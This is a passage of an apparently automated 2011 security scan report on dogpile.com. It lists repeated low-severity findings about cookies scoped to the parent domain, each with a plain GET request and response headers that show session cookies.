6.17. http://www.dogpile.com/dogpile_other/ws/bookmark/bwr=ffchrm/_iceUrlFlag=11  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/bookmark/bwr=ffchrm/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/bookmark/bwr=ffchrm/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=6f001cc080a04397bd88c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:15 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:15 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:15 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:14 GMT
Connection: close
Content-Length: 48633
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.18. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Images/_iceUrlFlag=11  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/bookmark/qcat=Images/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/bookmark/qcat=Images/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=ddb977a118474d1b9a72c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:09 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:09 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:09 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:09 GMT
Connection: close
Content-Length: 41894
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.19. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=News/_iceUrlFlag=11  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/bookmark/qcat=News/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/bookmark/qcat=News/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=3d97c313d94145899eeac16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:15 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:15 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:15 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:15 GMT
Connection: close
Content-Length: 41872
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.20. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Video/_iceUrlFlag=11  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/bookmark/qcat=Video/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/bookmark/qcat=Video/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=6bbbb232f4e94914b016c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:54 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:54 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:54 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:57:54 GMT
Connection: close
Content-Length: 41884
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.21. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Web/_iceUrlFlag=11  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/bookmark/qcat=Web/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/bookmark/qcat=Web/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=f85c1be494fd483ab40dc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:08 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:08 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:08 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:07 GMT
Connection: close
Content-Length: 42207
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.22. http://www.dogpile.com/dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=86d1546926784d5188d2c16a3af0cb01&ActionId=f1e07d8163f9435e87f8c16a3af0cb01&CookieDomain=.dogpile.com; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:05 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=f1e07d8163f9435e87f8c16a3af0cb01&ActionId=6ed1b194da28448c8f14c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:06 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:06 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:06 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:56:06 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 42209

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.23. http://www.dogpile.com/dogpile_other/ws/categories/_iceUrlFlag=11  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/categories/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/categories/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=670b820e86e94451af97c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:50 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:50 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:50 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:49 GMT
Connection: close
Content-Length: 41769
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.24. http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/faq/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/faq/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile_other/ws/index
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=f1e07d8163f9435e87f8c16a3af0cb01&ActionId=859dec9ca7a74a60921ac16a3af0cb01&CookieDomain=.dogpile.com; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:52 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=fabc047e90564b3caea8c16a3af0cb01&ActionId=c6139e801eee4175a160c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:15 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:15 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:15 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:56:15 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 64601

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.25. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Images/_iceUrlFlag=11  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/faq/qcat=Images/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/faq/qcat=Images/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=302e17dfa32741629beac16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:30 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:30 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:30 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:30 GMT
Connection: close
Content-Length: 64282
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.26. http://www.dogpile.com/dogpile_other/ws/faq/qcat=News/_iceUrlFlag=11  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/faq/qcat=News/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/faq/qcat=News/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=8d4c05bb90314dba98a5c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:32 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:32 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:32 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:32 GMT
Connection: close
Content-Length: 64258
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.27. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Video/_iceUrlFlag=11  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/faq/qcat=Video/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/faq/qcat=Video/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=5b79a7352bbb4726a052c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:31 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:31 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:31 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:31 GMT
Connection: close
Content-Length: 64276
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.28. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Web/_iceUrlFlag=11  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/faq/qcat=Web/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/faq/qcat=Web/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=8e6e2554f391469f90c0c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:29 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:29 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:29 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:29 GMT
Connection: close
Content-Length: 64601
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.29. http://www.dogpile.com/dogpile_other/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=d19fcdce85e94a39b89bc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:15 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:15 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:15 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:14 GMT
Connection: close
Content-Length: 64599
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.30. http://www.dogpile.com/dogpile_other/ws/index  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/index

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/index HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://dogpile.com/dogpile/ws/index/qcat=wp/_iceUrlFlag=11?_IceUrl=true
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=bc343352182e410c9000c16a3af0cb01&ActionId=91f95e6548a4490186bdc16a3af0cb01&CookieDomain=.dogpile.com; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:57 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=91f95e6548a4490186bdc16a3af0cb01&ActionId=62fda6b6aa3440d49bc7c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:15:44 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:44 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:55:44 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:55:44 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 45935

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.31. http://www.dogpile.com/dogpile_other/ws/index/_iceUrlFlag=11  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/index/_iceUrlFlag=11

Issue detail

